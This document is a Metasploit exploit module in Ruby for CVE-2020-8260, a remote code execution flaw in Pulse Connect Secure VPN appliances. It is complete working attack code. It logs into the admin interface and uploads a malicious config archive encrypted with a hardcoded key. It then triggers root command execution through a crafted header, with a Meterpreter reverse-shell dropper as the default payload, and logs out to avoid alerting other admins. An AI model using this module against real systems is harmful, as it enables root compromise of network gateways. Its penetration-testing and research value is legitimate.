## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager ENCRYPTION_KEY = "\x7e\x95\x42\x1a\x6b\x88\x66\x41\x43\x1b\x32\xc5\x24\x42\xe2\xe4\x83\xf8\x1f\x58\xb0\xe9\xe9\xa5".b def initialize(info = {}) super( update_info( info, 'Name' => 'Pulse Secure VPN gzip RCE', 'Description' => %q{ The Pulse Connect Secure appliance before 9.1R9 suffers from an uncontrolled gzip extraction vulnerability which allows an attacker to overwrite arbitrary files, resulting in Remote Code Execution as root. Admin credentials are required for successful exploitation. Of note, MANY binaries are not in `$PATH`, but are located in `/home/bin/`. }, 'Author' => [ 'h00die', # msf module 'Spencer McIntyre', # msf module 'Richard Warren ', # original PoC, discovery 'David Cash ', # original PoC, discovery ], 'References' => [ ['URL', 'https://gist.github.com/rxwx/03a036d8982c9a3cead0c053cf334605'], ['URL', 'https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-gzip-extraction-cve-2020-8260/'], ['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601'], ['CVE', '2020-8260'] ], 'DisclosureDate' => '2020-10-26', 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => true, 'Targets' => [ [ 'Unix In-Memory', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' } } ] ], 'Payload' => { 'Compat' => { 'ConnectionType' => '-bind' } }, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'CMDSTAGER::FLAVOR' => 'curl' }, 'DefaultTarget' => 1, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES], 'RelatedModules' => ['auxiliary/gather/pulse_secure_file_disclosure'] } ) ) register_options([ OptString.new('TARGETURI', [true, 'The URI of the application', '/']), OptString.new('USERNAME', [true, 'The username to login with', 'admin']), OptString.new('PASSWORD', [true, 'The password to login with', '123456']) ]) register_advanced_options([ OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 1.5 ]), ]) end def check(exploiting: false) login res = send_request_cgi({ 'uri' => normalize_uri('dana-admin', 'misc', 'admin.cgi') }) fail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless res&.code == 200 version = res.body.scan(%r{id="span_stats_counter_total_users_count"[^>]+>([^<(]+)(?:$build (\d+)$)?})&.last fail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless version version, build = version return CheckCode::Unknown unless version.include?('R') version, revision = version.split('R', 2) print_status("Version #{version.strip}, revision #{revision.strip}, build #{build.strip} found") return CheckCode::Appears if version.to_f <= 9.1 && revision.to_f < 9 CheckCode::Detected rescue Msf::Exploit::Failed CheckCode::Unknown ensure logout unless exploiting end def exploit case (checkcode = check(exploiting: true)) when Exploit::CheckCode::Vulnerable, Exploit::CheckCode::Appears print_good(checkcode.message) when Exploit::CheckCode::Detected print_warning(checkcode.message) else fail_with(Module::Failure::Unknown, checkcode.message.to_s) end case target['Type'] when :unix_memory execute_command(payload.encoded) when :linux_dropper execute_cmdstager( linemax: 262144, # 256KiB delay: datastore['CMDSTAGER::DELAY'] ) end logout end def execute_command(command, _opts = {}) trigger = Rex::Text.rand_text_alpha_upper(8) print_status("Exploit trigger will be at #{normalize_uri('dana-na', 'auth', 'setcookie.cgi')} with a header of #{trigger}") config = build_malicious_config(command, trigger) res = upload_config(config) fail_with(Failure::UnexpectedReply, 'File upload failed') unless res&.code == 200 print_status('Triggering RCE') send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'setcookie.cgi'), 'headers' => { trigger => trigger } }) end def res_get_xsauth(res) res.body.scan(%r{name="xsauth" value="([^"]+)"/>})&.last&.first end def upload_config(config) print_status('Requesting backup config page') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi'), 'headers' => { 'Referer' => "#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system" }, 'vars_get' => { 'type' => 'system' } }) fail_with(Failure::UnexpectedReply, 'Failed to request the backup configuration page') unless res&.code == 200 xsauth = res_get_xsauth(res) fail_with(Failure::UnexpectedReply, 'Failed to get the xsauth token') if xsauth.nil? post_data = Rex::MIME::Message.new post_data.add_part(xsauth, nil, nil, 'form-data; name="xsauth"') post_data.add_part('Import', nil, nil, 'form-data; name="op"') post_data.add_part('system', nil, nil, 'form-data; name="type"') post_data.add_part('8', nil, nil, 'form-data; name="optWhat"') post_data.add_part('', nil, nil, 'form-data; name="txtPassword1"') post_data.add_part('Import Config', nil, nil, 'form-data; name="btnUpload"') post_data.add_part(config, 'application/octet-stream', 'binary', 'form-data; name="uploaded_file"; filename="system.cfg"') print_status('Uploading encrypted config backup') send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'import.cgi'), 'method' => 'POST', 'headers' => { 'Referer' => "#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system" }, 'data' => post_data.to_s, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" }) end def login res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'), 'method' => 'POST', 'vars_post' => { 'tz_offset' => '-300', 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'realm' => 'Admin Users', 'btnSubmit' => 'Sign In' }, 'keep_cookies' => true }) fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 302 location = res.headers['Location'] fail_with(Failure::NoAccess, 'Login failed') if location.include?('failed') return unless location.include?('admin%2Dconfirm') # if the account we login with is already logged in, or another admin is logged in, a warning is displayed. Click through it. print_status('Other admin sessions detected, continuing') res = send_request_cgi({ 'uri' => location, 'keep_cookies' => true }) fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200 fds = res.body.scan(/name="FormDataStr" value="([^"]+)">/).last xsauth = res_get_xsauth(res) fail_with(Failure::UnexpectedReply, 'Login failed (missing form elements)') unless fds && xsauth res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'), 'method' => 'POST', 'vars_post' => { 'btnContinue' => 'Continue the session', 'FormDataStr' => fds.first, 'xsauth' => xsauth }, 'keep_cookies' => true }) fail_with(Failure::UnexpectedReply, 'Login failed') unless res end def logout print_status('Logging out to prevent warnings to other admins') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi') }) fail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 200 logout_uri = res.body.scan(%r{/dana-na/auth/logout\.cgi\?xsauth=\w+}).first fail_with(Failure::UnexpectedReply, 'Logout failed') if logout_uri.nil? res = send_request_cgi({ 'uri' => logout_uri }) fail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 302 end def build_malicious_config(cmd, trigger) payload_script = "#{Rex::Text.rand_text_alphanumeric(rand(6..13))}.sh" perl = <<~PERL if (length $ENV{HTTP_#{trigger}}){ chmod 0775, "/data/var/runtime/tmp/tt/#{payload_script}"; system("env /data/var/runtime/tmp/tt/#{payload_script}"); } PERL tarfile = StringIO.new Gem::Package::TarWriter.new(tarfile) do |tar| tar.mkdir('tmp', 509) tar.mkdir('tmp/tt', 509) tar.add_file('tmp/tt/setcookie.thtml.ttc', 511) do |tio| tio.write perl end tar.add_file("tmp/tt/#{payload_script}", 511) do |tio| tio.write "PATH=/home/bin:$PATH\n" tio.write "rm -- \"$0\"\n" tio.write cmd end end gzfile = StringIO.new gz = Zlib::GzipWriter.new(gzfile) gz.write(tarfile.string) gz.close encrypt_config(gzfile.string) end def encrypt_config(config_blob) cipher = OpenSSL::Cipher.new('DES-EDE3-CFB').encrypt iv = cipher.iv = cipher.random_iv cipher.key = ENCRYPTION_KEY md5 = OpenSSL::Digest.new('MD5', "#{iv}\x00#{[config_blob.length].pack('V')}") ciphertext = cipher.update(config_blob) ciphertext << cipher.final md5 << ciphertext cipher.reset "\x09#{iv}\x00#{[ciphertext.length].pack('V') + ciphertext + cipher.update(md5.digest) + cipher.final}" end end